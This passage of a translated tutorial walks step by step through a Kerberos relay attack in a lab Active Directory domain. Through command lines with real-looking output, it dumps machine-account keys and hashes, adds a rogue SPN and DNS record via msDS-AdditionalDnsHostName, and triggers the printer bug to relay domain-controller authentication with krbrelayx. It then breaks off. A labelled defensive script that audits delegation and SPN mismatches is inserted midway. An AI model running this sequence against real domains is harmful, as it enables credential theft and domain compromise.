
Kerberos relay attacks: abusing unconstrained delegation (part 2)

Source: compiled by this site  Author: Anonymous  Date: 2019-10-06

In the previous article I covered only the basic theory of the relay attack; in this one I walk through two concrete examples.
Example 1: using a computer account and the SpoolService bug to obtain DC sync rights
In the first case we abuse the unconstrained delegation rights of a computer account in my internal.corp lab domain. We obtained administrative rights on this host by compromising the user testuser, who is a member of the local Administrators group on it. Following the steps listed earlier, we first obtain the Kerberos keys and the NTLM hash:
[email protected]:~$ secretsdump.py [email protected]
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
Password:
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x38f3153a77837cf2c5d04b049727a771
...cut...
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ICORP\ICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
ICORP\ICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd
ICORP\ICORP-W10$:des-cbc-md5:91abd073c7a8e534
ICORP\ICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6:::
Now we add the SPN, authenticating as the device account with the NTLM hash we just dumped. The account can modify its own SPNs, but only through the msDS-AdditionalDnsHostName attribute discussed earlier. We use the addspn.py utility to add the SPN HOST/attacker.internal.corp (the SPN used for SMB) to the computer account.
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp -q icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=ICORP-W10,CN=Computers,DC=internal,DC=corp - STATUS: Read - READ TIME: 2019-01-09T21:55:23.923810
    dNSHostName: ICORP-W10.internal.corp
    sAMAccountName: ICORP-W10$
    servicePrincipalName: RestrictedKrbHost/ICORP-W10
                          HOST/ICORP-W10
                          RestrictedKrbHost/ICORP-W10.internal.corp
                          HOST/ICORP-W10.internal.corp
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute
[email protected]:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
The SPN for attacker.internal.corp now exists on the victim account, but there is no DNS entry for it yet. We use the dnstool.py utility to add a record pointing to the attacker's IP:
[email protected]:~/krbrelayx$ python dnstool.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r attacker.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
[email protected]:~/krbrelayx$ nslookup attacker.internal.corp 192.168.111.2
Server:  192.168.111.2
Address: 192.168.111.2#53
Name: attacker.internal.corp
Address: 192.168.111.87
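The two preceding steps rely on a computer account being trusted for unconstrained delegation and on the validated-write rule that only allows SPNs matching the account's own hostname, which msDS-AdditionalDnsHostName sidesteps. From the defender's side, the same attributes are what an audit should look at. The following Python script is an added example, not part of the original article or of the krbrelayx project: it runs an offline audit over constructed computer-object records shaped like the attributes in the addspn.py output above (attribute names are the real AD ones; the records, the FILESRV01$ account and the 0x80000 constant for TRUSTED_FOR_DELEGATION are assumptions of this example, a real run would read the records from LDAP).

```python
# Added audit example (not from the original article or the krbrelayx project).
# Flags computer accounts that are trusted for unconstrained delegation, and
# SPNs or msDS-AdditionalDnsHostName values that reference a host other than the
# account's own dNSHostName. The records below are constructed sample data.

# userAccountControl bit for unconstrained delegation (assumed constant value 0x80000).
TRUSTED_FOR_DELEGATION = 0x80000
WORKSTATION_TRUST_ACCOUNT = 0x1000

# Constructed sample records; the first one mirrors the state after the
# --additional write shown in the article, the second is a benign file server.
SAMPLE_COMPUTERS = [
    {
        "sAMAccountName": "ICORP-W10$",
        "dNSHostName": "ICORP-W10.internal.corp",
        "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
        "servicePrincipalName": [
            "RestrictedKrbHost/ICORP-W10",
            "HOST/ICORP-W10",
            "RestrictedKrbHost/ICORP-W10.internal.corp",
            "HOST/ICORP-W10.internal.corp",
            "HOST/attacker.internal.corp",
        ],
        "msDS-AdditionalDnsHostName": ["attacker.internal.corp"],
    },
    {
        "sAMAccountName": "FILESRV01$",  # hypothetical benign account
        "dNSHostName": "filesrv01.internal.corp",
        "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
        "servicePrincipalName": [
            "HOST/FILESRV01",
            "HOST/filesrv01.internal.corp",
            "CIFS/filesrv01.internal.corp",
        ],
        "msDS-AdditionalDnsHostName": [],
    },
]


def spn_host(spn):
    """Return the host part of an SPN (class/host[:port][/name]), lower-cased."""
    rest = spn.split("/", 1)[1] if "/" in spn else spn
    host = rest.split("/", 1)[0]   # drop an optional trailing service name
    host = host.split(":", 1)[0]   # drop an optional port
    return host.lower()


def expected_hosts(computer):
    """Hostnames an SPN on this account may legitimately reference: FQDN and short name."""
    fqdn = computer["dNSHostName"].lower()
    return {fqdn, fqdn.split(".", 1)[0]}


def audit_computer(computer):
    """Return a list of findings for one computer object (empty list when clean)."""
    findings = []
    allowed = expected_hosts(computer)
    if computer["userAccountControl"] & TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained delegation enabled")
    for spn in computer.get("servicePrincipalName", []):
        if spn_host(spn) not in allowed:
            findings.append(f"SPN host mismatch: {spn}")
    for extra in computer.get("msDS-AdditionalDnsHostName", []):
        if extra.lower() not in allowed:
            findings.append(f"additional DNS hostname not matching account: {extra}")
    return findings


def audit_all(computers):
    """Map sAMAccountName -> findings, keeping only accounts with at least one finding."""
    report = {}
    for computer in computers:
        findings = audit_computer(computer)
        if findings:
            report[computer["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit_all(SAMPLE_COMPUTERS).items():
        print(account)
        for finding in findings:
            print("  -", finding)
```

A hostname mismatch is not proof of compromise (clustered services legitimately use msDS-AdditionalDnsHostName), so the script reports for review rather than deciding; the combination of unconstrained delegation plus a foreign hostname on the same account is the pairing the attack above needs and is worth prioritising.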
Now we use the printer bug to make the domain controller authenticate to us, while krbrelayx runs in export mode, in which every extracted TGT is written to disk. We pass krbrelayx the AES256 key, since that is the key used by default for computer accounts.
[email protected]:~/krbrelayx$ python printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 internal.corp/icorp-w10\[email protected] attacker.internal.corp
[*] Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Attempting to trigger authentication via rprn RPC at icorp-dc.internal.corp
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
krbrelayx, running in a separate screen:
[email protected]:~/krbrelayx$ sudo python krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
